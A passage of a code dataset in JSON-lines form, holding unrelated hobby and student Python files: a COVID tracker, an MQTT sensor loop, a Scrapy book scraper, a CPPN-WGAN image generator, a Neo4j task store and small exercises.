a high death rate.\")\r\n else :\r\n tkinter.messagebox.showinfo(\"Report\",\"This country have a high death rate.\")\r\n \r\n\r\n\r\n\r\n## Read datas\r\ninfile = open(\"testing.txt\",\"r\")\r\ncontent = infile.read()\r\ndata = content.split(\"\\n\")\r\ncountryNum = 0\r\nfor i in data:\r\n data[countryNum] = i.split(\",\")\r\n k = 0\r\n for element in data[countryNum]:\r\n data[countryNum][k] = element.strip(' []\"')\r\n k += 1\r\n countryNum += 1\r\n\r\n\r\ncountryName = []\r\n\r\ni = 0\r\nwhile i <= 52:\r\n countryName.append(data[i][0])\r\n i += 1\r\n\r\n\r\n\r\n#searching data by using country name\r\ndef search(name):\r\n i = 0\r\n for ele in data:\r\n if ele[0]==name:\r\n return data[i]\r\n i+=1\r\n return(False) \r\n\r\n\r\n#reminder of dangerous region\r\ntotalDeath = 0\r\ntotalCases = 0\r\nposition = 0\r\n\r\nfor i in countryName:\r\n ind = countryName.index(i)\r\n data[ind].append(0)\r\n totalCases += int(data[ind][1])\r\n totalDeath += int(data[ind][3])\r\n\r\naveDeathRate = totalDeath / totalCases\r\n\r\nposition = 0\r\nfor i in countryName:\r\n ind = countryName.index(i)\r\n if ((int(data[ind][3]))/(int(data[ind][1]))) > aveDeathRate:\r\n data[ind][6]=1\r\n print(\"This country, \" + i + \" have a high death risk.\")\r\n\r\n#user windows\r\nframe = MainWindow()\r\n","sub_path":"covid-tracking.py","file_name":"covid-tracking.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"557148777","text":"import machine, time, json\n\nfrom wlan_manager import WLAN_Manager # Wireless Connection \nwlan_client = WLAN_Manager()\nwlan_client.start()\n\nfrom mqtt_manager import MQTT_Manager # MQTT Connection\nmqtt_client = MQTT_Manager()\nmqtt_client.check() # Open connection to broker\nTOPIC_SUB = mqtt_client.get_topic('control')\nTOPIC_PUB = mqtt_client.get_topic('status')\n\ndef mqtt_callback(topic, msg):\n print('MSG! Topic:{}; Data{}'.format(topic, msg))\nmqtt_client.broker.set_callback(mqtt_callback)\nmqtt_client.broker.subscribe(TOPIC_SUB)\n\n# Change this to your sensor\nfrom board_manager import D1\nfrom sensor_manager import Sensor_DS18B20\nsensor = Sensor_DS18B20(D1) # Pin 5 = D1\n\nDELAY = 5 * 1000 # DELAY in milliseconds\nwhile True:\n sensor.read()\n msg = sensor.values_dict\n print(msg)\n mqtt_client.send(TOPIC_PUB, json.dumps(msg))\n t_start = time.ticks_ms()\n while time.ticks_diff(time.ticks_ms(), t_start) <= DELAY:\n mqtt_client.check_msg() # check for new messages\n time.sleep_ms(200)\n#End main loop\n","sub_path":"examples/MQTT_PUB_and_SUB_example.py","file_name":"MQTT_PUB_and_SUB_example.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"101472920","text":"\"\"\"\nTest utility functions\n\"\"\"\n__author__ = 'Dan Gunter '\n\nimport unittest\nfrom biokbase.narrative.common import util\n\nclass MyTestCase(unittest.TestCase):\n def test_kvparse(self):\n for input, text, kvp in (\n (\"foo\", \"foo\", {}),\n (\"name=val\", \"\", {\"name\": \"val\"}),\n (\"a name=val boy\", \"a boy\", {\"name\": \"val\"})\n ):\n rkvp = {}\n rtext = util.parse_kvp(input, rkvp)\n self.assertEqual(text, rtext, \"Text '{}' does not match \"\n \"result '{}' \"\n \"from input '{}'\".format(\n text, rtext, input))\n self.assertEqual(text, rtext, \"Dict '{}' does not match \"\n \"result '{}' \"\n \"from input '{}'\".format(\n kvp, rkvp, input))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/biokbase/narrative/common/tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398911064","text":"import re\nfrom nltk.tokenize import word_tokenize\nimport read_dataset as read_dataset\n\nimport importlib\nimportlib.reload(read_dataset)\n\ndef review_to_sentences(review):\n # mengubah review menjadi list of sentence\n sentences_review = re.split(\"([.!] )\", review)\n \n num_sentence = len(sentences_review)\n \n for index in range(0,num_sentence):\n if len(sentences_review[index]) <= 2:\n sentences_review[index-1] +=sentences_review[index]\n \n for index in range(0,num_sentence):\n try:\n if len(sentences_review[index]) <= 2:\n del sentences_review[index]\n except IndexError:\n break\n return sentences_review\n\ndef tokenize_sentence(sentence, is_handling_negation = True):\n # melakukan tokenasi terhadap sentence\n # jika is_handling_negation = True, maka negasi di handle\n tokenized_sentence = word_tokenize(sentence) \n \n if is_handling_negation:\n tokenized_sentence = handling_negation_of_tokenized_sentence(tokenized_sentence)\n\n return tokenized_sentence \n\ndef handling_negation_of_tokenized_sentence(tokenized_sentence): \n # melakukan handlingg terhadap sentence yang sudah di tokenized (list of token)\n negation_token = [\"not\", \"n't\", \"no\"]\n \n negated = False\n negation_handled_sentence = []\n \n for token in tokenized_sentence:\n if token in negation_token:\n negated = True\n else:\n if negated:\n negation_handled_sentence.append(\"not \" + token)\n else:\n negation_handled_sentence.append(token)\n negated = False \n return negation_handled_sentence \n\ndef review_to_tokenized_sentences(review, is_handling_negation=True):\n # melakukan tokenizing review (review -> sentences -> )\n sentences = review_to_sentences(review)\n tokenized_review = []\n for sentence in sentences:\n \n tokenized_sentence = tokenize_sentence(sentence, is_handling_negation)\n #print(tokenized_sentence)\n tokenized_review.append(tokenized_sentence)\n \n return tokenized_review\n\n\ndef testing_tokenize_review():\n review = \"Although I didn't like Stanley & Iris tremendously as a film, I did admire the acting! Jane Fonda and Robert De Niro are great in this movie. I haven't always been a fan of Fonda's work but here she is delicate and strong at the same time. De Niro has the ability to make every role he portrays into acting gold. He gives a great performance in this film and there is a great scene where he has to take his father to a home for elderly people because he can't care for him anymore that will break your heart. I wouldn't really recommend this film as a great cinematic entertainment, but I will say you won't see much bette acting anywhere.\"\n review_to_tokenized_sentences(review)\n \n \nif __name__ == \"__main__\":\n # it is saved to data/structured/sentence_neg_handled/\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('train','pos')\")\n # read_dataset.save_from_corpus_to_sent(\"train\",\"pos\")\n\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('test','pos')\")\n # read_dataset.save_from_corpus_to_sent(\"test\",\"pos\")\n\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('train','neg')\")\n # read_dataset.save_from_corpus_to_sent(\"train\",\"neg\")\n\n # print(\"[PROCESS] : read_dataset.save_from_corpus_to_sent('test','neg')\")\n # read_dataset.save_from_corpus_to_sent(\"test\",\"neg\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('train','pos')\")\n read_dataset.save_from_corpus(\"train\",\"pos\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('test','pos')\")\n read_dataset.save_from_corpus(\"test\",\"pos\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('train','neg')\")\n read_dataset.save_from_corpus(\"train\",\"neg\")\n\n print(\"[PROCESS] : read_dataset.save_from_corpus('test','neg')\")\n read_dataset.save_from_corpus(\"test\",\"neg\")\n \n ","sub_path":"negation_handling.py","file_name":"negation_handling.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"371835537","text":"import cv2\nimport sys\nimport numpy as np\nimport os.path\nfrom glob import glob\n\ndef detect(filename, filename2):\n\timageLeft = cv2.imread(filename)\n\timageRight = cv2.imread(filename2)\n\twidth = len(imageLeft[0])\n\theight = len(imageRight)\n\n\toutIMG = np.zeros((height, width * 2, 3), np.uint8)\n\tfor x in range(0, height):\n\t\tfor y in range(0, width):\n\t\t\toutIMG[x][y] = imageLeft[x][y]\n\t\tfor y in range(width, width * 2):\n\t\t\toutIMG[x][y] = imageRight[x][y - width]\n\tcv2.imwrite(\"./output/\" + filename[7:len(filename)], outIMG)\n\tprint(filename[7:len(filename)] + \" Done.\")\n\nif __name__ == '__main__':\n\tif os.path.exists('output') is False:\n\t\tos.makedirs('output')\n\tfile_list = glob('./input/*.jpg')\n\tfile_list2 = glob('./right/*.jpg')\n\tfor i in range(0, len(file_list)):\n\t\tdetect(file_list[i], file_list2[i])\n","sub_path":"paste.py","file_name":"paste.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"236012024","text":"#Exercise 5 Om and Joshua\n\nimport os\nimport numpy\nimport pandas\n\n\n#Set working directory and read in wages file\nos.chdir('/Users/omneelay/Desktop/Exercise5/Intro_Biocomp_ND_318_Tutorial5/')\nwages=pandas.read_csv(\"wages.csv\")\n\n#START OF CHALLENGE 1\n#isolate 2 columns: Gender and YearsExperience \nfirst2columns=wages.iloc[:,0:2]\n\n#isolate females and males separately\nfemales=first2columns[first2columns.gender==\"female\"]\nmales=first2columns[first2columns.gender==\"male\"]\n\n#remove duplicates and make into panda dataframe form\nF=females.drop_duplicates()\nM=males.drop_duplicates()\nf=pandas.DataFrame(F)\nm=pandas.DataFrame(M)\n\n#concatenate dataframes and write to a file\nA=pandas.concat([f,m])\nfirst2columnsA=A.iloc[:,0:2]\nfirst2columnsA\nA.to_csv(\"challenge1.txt\",sep=' ')\n\n#START OF CHALLENGE 2","sub_path":"Exercise5_Old.py","file_name":"Exercise5_Old.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516776389","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom scrapy import Spider\nfrom scrapy.http import Request\n\n\nlogging.basicConfig(filename='BooksSpider.log',\n filemode='w', # logging for each run will start afresh\n level=logging.DEBUG,\n format='%(asctime)s %(message)s')\nlogger = logging.getLogger()\n\n\ndef product_info(response, value):\n return response.xpath('//th[text()=\"' + value + '\"]/following-sibling::td/text()').extract_first()\n\n\nclass BookSpider(Spider):\n name = 'BookSpider'\n allowed_domains = ['books.toscrape.com']\n start_urls = ['http://books.toscrape.com']\n\n def parse(self, response):\n categories = response.xpath('//ul/li/a/@href').extract()\n for category in categories:\n category_url = response.urljoin(category)\n yield Request(category_url, callback=self.parse_category)\n\n def parse_category(self, response):\n books = response.xpath('//h3/a/@href').extract()\n category = response.xpath('//h1/text()').extract()\n logger.info('Scraping category: {}'.format(category))\n for book in books:\n absolute_url = response.urljoin(book)\n yield Request(absolute_url, callback=self.parse_book)\n\n # process next page\n next_page_url = response.xpath('//a[text()=\"next\"]/@href').extract_first()\n absolute_next_page_url = response.urljoin(next_page_url)\n yield Request(absolute_next_page_url, callback=self.parse_category)\n\n def parse_book(self, response):\n category = response.xpath('//li/a/text()')[-1].extract()\n title = response.css('h1::text').extract_first()\n logger.info('Scraping book: {}'.format(title))\n price = response.xpath('//*[@class=\"price_color\"]/text()').extract_first()\n\n image_url = response.xpath('//img/@src').extract_first()\n image_url = image_url.replace('../..', 'http://books.toscrape.com/')\n\n rating = response.xpath('//*[contains(@class, \"star-rating\")]/@class').extract_first()\n rating = rating.replace('star-rating ', '')\n\n description = response.xpath(\n '//*[@id=\"product_description\"]/following-sibling::p/text()').extract_first()\n\n # product information data points\n upc = product_info(response, 'UPC')\n product_type = product_info(response, 'Product Type')\n price_without_tax = product_info(response, 'Price (excl. tax)')\n price_with_tax = product_info(response, 'Price (incl. tax)')\n tax = product_info(response, 'Tax')\n availability = product_info(response, 'Availability')\n number_of_reviews = product_info(response, 'Number of reviews')\n\n yield {\n 'category': category,\n 'title': title,\n 'price': price,\n 'image_url': image_url,\n 'rating': rating,\n 'description': description,\n 'upc': upc,\n 'product_type': product_type,\n 'price_without_tax': price_without_tax,\n 'price_with_tax': price_with_tax,\n 'tax': tax,\n 'availability': availability,\n 'number_of_reviews': number_of_reviews\n }","sub_path":"books_crawler/books_crawler/spiders/books_crawler.py","file_name":"books_crawler.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592227232","text":"#A Keras, Wasserstein Generative Adversarial Network with the generator as a Compositional Pattern Producing Network\n#Heavily influenced by http://blog.otoro.net/2016/04/01/generating-large-images-from-latent-vectors/\n#Novel (maybe?) in that it uses Wasserstein loss to achieve diversity and stability in generating color images\n\n\n#CPPNs are attractive because they can generate aesthetically pleasing large images without a super-resolution network by inputting fractions of integers during prediction\nimport tensorflow as tf\nfrom tensorflow.contrib import keras as keras\n\n\nfrom keras import backend as K\nfrom keras.layers import TimeDistributed\nfrom keras.layers import Input, Dense, Reshape, Flatten, Dropout\nfrom keras.layers import BatchNormalization, Activation, ZeroPadding2D,TimeDistributed,Lambda,MaxPooling2D,SeparableConv2D\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.layers.convolutional import UpSampling2D, Conv2D\nfrom keras.models import Sequential, Model, load_model\nfrom keras.optimizers import Adam, SGD, RMSprop\nfrom keras import backend as K\nfrom keras.layers.merge import add\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nfrom keras.utils import plot_model\n\n\n\n\n\nimport numpy as np\n\nimport os\nimport random\n\nimport imageio\nfrom scipy import misc, ndimage\n\n#can't change scaler rn and reload. Fix that or at least make a generator mode that only loads generator weights and then fits\n\nsideL = 32#width and height by pixel of resized images\nzN = 20#latent vector's size\nbatch_size = 4#size of batches\nload = True#whether to load model from file\nlr = .0001#change b1 in adam to .5\nbatches = 1200\nscaler = 4#scales up image\n\ndef loadDataset(location):#input string indicating dataset location; output numpy array of images\n\tfiles = os.listdir(location)\n\tos.chdir(location)\n\t#get only the files we want from the dataset\n\tremover = []\n\tfor i in files:\n\t\tfilename, file_extension = os.path.splitext(i)\n\t\tif file_extension != '.jpg':\n\t\t\tremover.append(i)\n\tfor i in remover:\n\t\tfiles.remove(i)\n\t\t\n\tX_train = np.zeros((len(files),sideL,sideL,3))\n\tfor i in range(len(files)):\n\t\tgreader = imageio.get_reader(files[i])\n\t\tfirst = greader.get_data(0)\n\t\tfirst = misc.imresize(first,(sideL,sideL,3))\n\t\tfirst = first/255\n\t\tX_train[i] = first\n\treturn X_train\n\t\n#initializers\ndef my_init(shape, dtype=None):\n return K.random_normal_variable(shape=shape, mean=.0, scale=.5)\n\ndef small_init(shape, dtype=None):\n return K.random_normal_variable(shape=shape, mean=.0, scale=.01)\n\ndef generator(input_z):\n\t\n\twith tf.variable_scope('generator'):\n\t\t\n\t\t#create generator\n\t\t\n\t\tinputs = Input(tensor = input_z)\n\n\t\tj = Dense(30,activation='linear')(inputs)\n\t\tfor i in range(4):#JUST TESTING! CHANGE LATER\n\t\t\tz = BatchNormalization()(j)\n\t\t\tx = Dense(30,kernel_initializer=my_init)(z)\n\t\t\tx = Activation('relu')(x)\n\t\t\tx = Dense(30,kernel_initializer=my_init)(x)\n\t\t\tx = Activation('relu')(x)\n\t\t\tx = Dense(30,activation='tanh')(x)\n\t\t\t\n\t\t\tj = add([j,x]) #residual network\n\n\t\tend = Dense(3,activation='sigmoid',name='gend',kernel_initializer=small_init)(j)\n\n\t\t\n\t\t#inny = Input(shape=(sideL*sideL,3+zN),tensor = input_z)\n\t\t#xer = TimeDistributed(Dense(sideL*sideL))(end)\n\t\t\n\t\t\n\t\t\n\t\tgen = Model(inputs,end)\n\t\t\n\t\treturn end,gen\n\t\ndef discriminator(image):#I'VE REPLACED BATCHNORMS WITH LAYERNORMS\n\talphaL = .2\n\twith tf.variable_scope('discriminator', reuse=tf.AUTO_REUSE):\n\t\tinny = tf.reshape(image,(batch_size,sideL,sideL,3))\n\t\t\n\t\tconv1 = tf.layers.Conv2D(filters=32,kernel_size=5,strides=2,padding='SAME')\n\t\tconv1 = conv1(inny)\n\t\tleaky1 = tf.maximum(alphaL * conv1, conv1)\n\t\t\n\t\tdrop1 = tf.layers.dropout(leaky1)\n\t\t\n\t\tconv2 = tf.layers.Conv2D(filters=64,kernel_size=5,strides=2,padding='SAME')\n\t\tconv2 = conv2(drop1)\n\t\tbatch_norm2 = tf.contrib.layers.layer_norm(conv2, trainable=True)\n\t\tleaky2 = tf.maximum(alphaL * batch_norm2, batch_norm2)\n\t\t\n\t\tdrop2 = tf.layers.dropout(leaky2)\n\t\t\n\t\tconv3 = tf.layers.Conv2D(filters=128,kernel_size=4,strides=2,padding='SAME')\n\t\tconv3=conv3(drop2)\n\t\tbatch_norm3 = tf.contrib.layers.layer_norm(conv3, trainable=True)\n\t\tleaky3 = tf.maximum(alphaL * batch_norm3, batch_norm3)\n\t\t\n\t\tdrop3 = tf.layers.dropout(leaky3)\n\t\t\n\t\tconv4 = tf.layers.Conv2D(filters=256,kernel_size=5,strides=2,padding='SAME')\n\t\tconv4=conv4(drop3)\n\t\tbatch_norm4 = tf.contrib.layers.layer_norm(conv4, trainable=True)\n\t\tleaky4 = tf.maximum(alphaL * batch_norm4, batch_norm4)\n\t\t\n\t\tdrop4 = tf.layers.dropout(leaky4)\n\t\t\n\t\t\n\t\tflatter = tf.contrib.layers.flatten(drop4)#default rate = .5\n\t\t\n\t\tdense = tf.layers.dense(flatter,1)\n\t\t\n\t\t#out = tf.sigmoid(dense)\n\t\t\n\t\treturn dense\ndef makeGan():\n\tinput_real = tf.placeholder(tf.float32, shape=(None, sideL, sideL, 3), name='input_real') \n\t\n\t#input_z = tf.placeholder(tf.float32, (None, zN+3), name='input_z')\n\t\n\tinput_z = K.placeholder(shape=(None,sideL*sideL,zN+3))\n\t\n\tinput_scale = K.placeholder(shape=(None,sideL*sideL*scaler*scaler,zN+3))\n\t\n\tlearning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n\txer,gen = generator(input_z)\n\t\n\t_,_ = generator(input_scale)\n\t\n\t#gradient penalty adapted from:\n\t# @misc{wu2016tensorpack,\n\t\t # title={Tensorpack},\n\t\t # author={Wu, Yuxin and others},\n\t\t # howpublished={\\url{https://github.com/tensorpack/}},\n\t\t # year={2016}\n\t\t# }\n\t\n\t\n\td_mod_real = discriminator(input_real)\n\t\n\t\n\td_mod_fake = discriminator(xer)\n\t\n\t\n\td_loss_real = tf.reduce_mean(d_mod_real)\n\t\n\td_loss_fake = tf.reduce_mean(d_mod_fake)\n\t\n\tg_loss = -tf.reduce_mean(d_mod_fake)\n\t\n\talpha = tf.random_uniform(minval=0.,maxval=1.,shape=(batch_size,1,1,1))\n\t\n\tinter = input_real + alpha*(tf.reshape(xer,(batch_size,sideL,sideL,3)) - input_real)\n\t\n\toutInter = discriminator(inter)\n\t\n\tgradients = tf.gradients(outInter,[inter])[0]\n\tgradients = tf.sqrt(tf.reduce_sum(tf.square(gradients),[1,2,3]))\n\tgradient_penalty=tf.reduce_mean(tf.square(gradients-1))\n\t\n\t\n\td_loss = tf.add(d_loss_fake-d_loss_real, 10*gradient_penalty)\n\t\n\t\n\t\n\t\n\tt_vars = tf.trainable_variables()\n\td_vars = [var for var in t_vars if var.name.startswith('discriminator')]\n\tg_vars = [var for var in t_vars if var.name.startswith('generator')]\n\t\n\t\n\t\n\twith tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n\t\td_opt = tf.train.AdamOptimizer(lr,.5,.9).minimize(d_loss, var_list=d_vars)\n\t\tg_opt = tf.train.AdamOptimizer(lr,.5,.9).minimize(g_loss, var_list=g_vars)\n\t\n\t\n\treturn d_opt,g_opt,d_loss,g_loss,input_real,input_z,gen,input_scale\n\n\t\n#prepare noise and coordinates for larger image\ndef initialScaledInput():\n\tbigBoi = np.ones((sideL**2*scaler**2,3+zN))\n\tnoiser = np.random.normal(0, 1, (zN,))\n\tfor x in range(sideL*scaler):\n\t\tfor y in range(sideL*scaler):\n\t\t\tr = ((x/scaler-sideL/2)**2+(y/scaler-sideL/2)**2)**(1/2)\n\t\t\t#r = ((x/scaler)**2+(y/scaler)**2)**(1/2)\n\t\t\tlil = [x/scaler,y/scaler,r]\n\t\t\tbigBoi[y+x*sideL*scaler] = np.concatenate((noiser,np.array(lil)))\n\treturn bigBoi\n#create new noise input\ndef newScaledNoise():\n\tnoiser = np.random.normal(0, 1, (zN,))\n\tinitScaled[:,:zN] = noiser\n\t\n\ninitScaled = initialScaledInput()\n\n\t\n#prepare noise and location in image input\n\nintos = np.ones((batch_size,sideL*sideL,3+zN))\nlit = np.ones((sideL*sideL,3+zN))\nfor q in range(batch_size):\n\tnoiser = np.random.normal(0, 1, (zN,))\n\tfor x in range(sideL):\n\t\tfor y in range(sideL):\n\t\t\tr = ((x-sideL/2)**2+(y-sideL/2)**2)**(1/2)#distance from center of image\n\t\t\t#r = ((x)**2+(y)**2)**(1/2)\n\t\t\tlil = [x,y,r]\n\t\t\tlit[y+x*sideL] = np.concatenate((noiser,np.array(lil)))\n\tintos[q] = lit\n\t\n#define new noise input\ndef newNoise():\n\tfor i in range(batch_size):\n\t\tnoiser = np.random.normal(0, 1, (zN,))\t\t\t\n\t\tintos[i,:,:zN] = noiser\n\t\ndef train(i,saveDir,X_train):\n\t#consider batch sizes\n\t\n\t#would move below for 'jq in range(40)', but testing least stable part\n\tnewNoise()\n\t#get a batch of random images\n\tidx = np.random.randint(0, X_train.shape[0], batch_size)\n\timgs = X_train[idx]\n\tbatch_z = intos\n\t_ = sess.run(g_opt, feed_dict={input_real: imgs, input_z: batch_z})\n\t\n\t\n\t\n\tif i == 0:\n\t\tplot_model(gen, to_file=saveDir+'model.png')\n\t\tfor jq in range(100):\n\t\t\tprint(jq,'prepping discriminator')\n\t\t\tnewNoise()\n\t\t\tidx = np.random.randint(0, X_train.shape[0], batch_size)\n\t\t\timgs = X_train[idx]\n\t\t\t\n\t\t\tbatch_z = intos\n\t\t\t_ = sess.run(d_opt, feed_dict={input_real: imgs, input_z: batch_z})\n\t\t\t\n\t\n\t\n\t\n\ttrain_loss_g = g_loss.eval({input_z: batch_z, input_real: imgs})\n\t\n\t\n\tfor qz in range(5):\n\t\tidx = np.random.randint(0, X_train.shape[0], batch_size)\n\t\timgs = X_train[idx]\n\t\tnewNoise()\n\t\tbatch_z = intos\n\t\t_ = sess.run(d_opt, feed_dict={input_real: imgs, input_z: batch_z})\n\t\t\n\t\t\n\n\t\n\ttrain_loss_d = d_loss.eval({input_z: batch_z, input_real: imgs})\n\t\n\t\n\t\n\tprint(\"Step:\"+str(i)+\" g \"+str(train_loss_g)+\" d \"+str(train_loss_d))\n\t\n\t\n\t\n\tif (i+1) % 30 == 0 or i == 0: #save weights and sample every while\n\t\tif i != 0:\n\t\t\tsavedp = saver.save(sess, saveDir+'wcppn.ckpt')\n\t\t\tprint(savedp)\n\t\t\n\t\tnewScaledNoise()\n\t\texampIn = np.expand_dims(initScaled,axis=0)\n\t\tsample = sess.run(gen(input_scale),feed_dict={input_scale:exampIn})\n\t\t\t\n\t\tout = np.resize(sample,(sideL*scaler,sideL*scaler,3))\n\t\t\n\t\tout = np.maximum(out,np.zeros(out.shape))\n\t\tout = np.minimum(out,np.ones(out.shape))\n\t\t\n\t\tnamed = saveDir+str(i)+'scaled'+'image.jpg'\n\t\timageio.imwrite(named, out)\n\t\t\n\t\tfor qtc in range(2):\n\t\t\t\n\t\t\t\n\t\t\tnewNoise()\n\t\t\t\n\t\t\texampIn = intos[:1]\n\t\t\t\n\t\t\t#sample = sess.run(generator(input_z),feed_dict={input_z:exampIn})\n\t\t\t\n\t\t\tsample = sess.run(gen(input_z),feed_dict={input_z:exampIn})\n\t\t\t\n\t\t\tout = np.resize(sample,(sideL,sideL,3))\n\t\t\t\n\t\t\tout = np.maximum(out,np.zeros(out.shape))\n\t\t\tout = np.minimum(out,np.ones(out.shape))\n\t\t\t\n\t\t\tnamed = saveDir+str(i)+' '+str(qtc)+'image.jpg'\n\t\t\timageio.imwrite(named, out)\n\t\t\n\t\t\ndataDir = os.path.normpath('C:/Users/Com/Python/sort/immFaceDBCropped/')+'\\\\'#dataset's path\nsaveDir = os.path.normpath('C:/Users/Com/Desktop/pic/')+'\\\\'#load and save weights from; save 3 images per batch here as well\n\n\nx_ = loadDataset(dataDir)\nwith tf.Session() as sess:\n\tK.set_session(sess)\n\td_opt,g_opt,d_loss,g_loss,input_real,input_z,gen,input_scale = makeGan()\n\tsess.run(tf.global_variables_initializer())\n\t\n\t\n\tsaver = tf.train.Saver()\n\t\t\t\n\tif load == True:\n\t\tsaver.restore(sess, saveDir+'wcppn.ckpt')\n\t\n\tfor i in range(batches):\n\t\ttrain(i,saveDir,x_)\n\t\n\t\n\t\n","sub_path":"CPPN-WGAN.py","file_name":"CPPN-WGAN.py","file_ext":"py","file_size_in_byte":10230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233737795","text":"#example Line\ndoubles_by_3 = [x * 2 for x in range(1, 6) if (x * 2) % 3 == 0]\n\n# Complete the following line. Use the line above for help.\n#squares of the even numbers between 1 to 11\neven_squares = [x**2 for x in range(1,12) if x%2==0]\n\nprint(even_squares)\n\n#Another example of square comprehention\ncubes_by_four = [x**3 for x in range(1,11) if (x**3) % 4==0]\nprint(cubes_by_four)\n","sub_path":"List_And_Iterations/List_Comprehension.py","file_name":"List_Comprehension.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595346751","text":"from perlin import Perlin\nfrom ursina import *\nfrom random import random\nfrom swirl_engine import SwirlEngine\n\nclass MeshTerrain:\n def __init__(this):\n \n this.block = load_model('block.obj')\n this.textureAtlas = 'texture_atlas_3.png'\n this.numVertices = len(this.block.vertices)\n\n this.subsets = []\n this.numSubsets = 128\n \n # Must be even number! See genTerrain()\n this.subWidth = 4 \n this.swirlEngine = SwirlEngine(this.subWidth)\n this.currentSubset = 0\n\n # Our terrain dictionary :D\n this.td = {}\n\n this.perlin = Perlin()\n\n for i in range(0,this.numSubsets):\n e = Entity( model=Mesh(),\n texture=this.textureAtlas)\n e.texture_scale*=64/e.texture.width\n this.subsets.append(e)\n \n\n def genBlock(this,x,y,z):\n # Extend or add to the vertices of our model.\n model = this.subsets[this.currentSubset].model\n\n model.vertices.extend([ Vec3(x,y,z) + v for v in \n this.block.vertices])\n # Record terrain in dictionary :)\n this.td[\"x\"+str(floor(x))+\n \"y\"+str(floor(y))+\n \"z\"+str(floor(z))] = \"t\"\n # Decide random tint for colour of block :)\n c = random()-0.5\n model.colors.extend( (Vec4(1-c,1-c,1-c,1),)*\n this.numVertices)\n\n # This is the texture atlas co-ord for grass :)\n uu = 8\n uv = 7\n if y > 2:\n uu = 8\n uv = 6\n model.uvs.extend([Vec2(uu,uv) + u for u in this.block.uvs])\n\n def genTerrain(this):\n # Get current position as we swirl around world.\n x = floor(this.swirlEngine.pos.x)\n z = floor(this.swirlEngine.pos.y)\n\n d = int(this.subWidth*0.5)\n\n for k in range(-d,d):\n for j in range(-d,d):\n\n y = floor(this.perlin.getHeight(x+k,z+j))\n if this.td.get( \"x\"+str(floor(x+k))+\n \"y\"+str(floor(y))+\n \"z\"+str(floor(z+j)))!=\"t\":\n this.genBlock(x+k,y,z+j)\n\n this.subsets[this.currentSubset].model.generate()\n # Current subset hack ;)\n if this.currentSubset(v)\"\n \" RETURN id(u)\")\n newId = 0\n for record in queryResult:\n newId = record['id(u)']\n break\n return newId\n\n\n# изменение параметров задачи newTask\ndef editTask(changedTask):\n global session\n session.run(\"MATCH (u)-[t:Depends]->(k)\"\n \" WHERE id(u)=\" + str(changedTask.id) +\n \" SET u.name='\" + changedTask.name + \"',\"\n \" u.description='\" + changedTask.description + \"',\"\n \" u.time=\" + str(changedTask.time) +\n \" DELETE t\"\n \" WITH DISTINCT u\"\n \" MATCH (v) WHERE id(v) in \" + str(changedTask.dependencies) +\n \" CREATE (u)-[:Depends]->(v)\")\n return None\n\n\n# удаление задачи с заданным _id\ndef deleteTask(_id):\n global session\n session.run(\"MATCH (u) WHERE id(u)=\" + str(_id) +\n \" DETACH DELETE u\")\n return None\n\n\n# Находит узел с заданным _id\n# Возвращает сконструированный объект\n# Если _id = None, то возвращает список\ndef find(_id = None):\n global session\n result = None\n if _id is not None:\n queryResult = session.run(\"MATCH (u) WHERE id(u) = \" + str(_id) +\n \" OPTIONAL MATCH (u)-[:Depends]->(v) \"\n \"RETURN u, id(v)\")\n for record in queryResult:\n n = record['u']\n if result is None:\n result = model.Task(int(n.id),\n n.properties['name'],\n n.properties['description'],\n n.properties['time'])\n v = record['id(v)']\n if v is not None:\n result.dependencies.append(v)\n\n else:\n result = []\n queryResult = session.run(\"MATCH (u)-[:Depends]->(v) RETURN u, v\")\n for record in queryResult:\n for key in record.keys():\n n = record[key]\n # добавление задачи если ее нет в списке\n isInList = False\n for r in result:\n isInList = isInList or n.id == r.id\n if not isInList:\n result.append(model.Task(int(n.id),\n n.properties['name'],\n n.properties['description'],\n n.properties['time']))\n # добавление связей - dependencies\n u = record['u'].id\n v = record['v'].id\n for task in result:\n if task.id == u:\n task.dependencies.append(v)\n return result\n","sub_path":"Graph/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"209577797","text":"import RPi.GPIO as GPIO\nimport time\nfrom psonic import *\nfrom random import randint\n\nrev = GPIO.RPI_REVISION\nprint(rev)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(23, GPIO.OUT)\nGPIO.setup(24, GPIO.IN)\n\nledOn = False\n\nwhile True:\n if GPIO.input(24):\n ledOn = True if (ledOn == False) else False\n play(randint(1, 100))\n\n GPIO.output(23, ledOn)\n time.sleep(0.2)\n\n 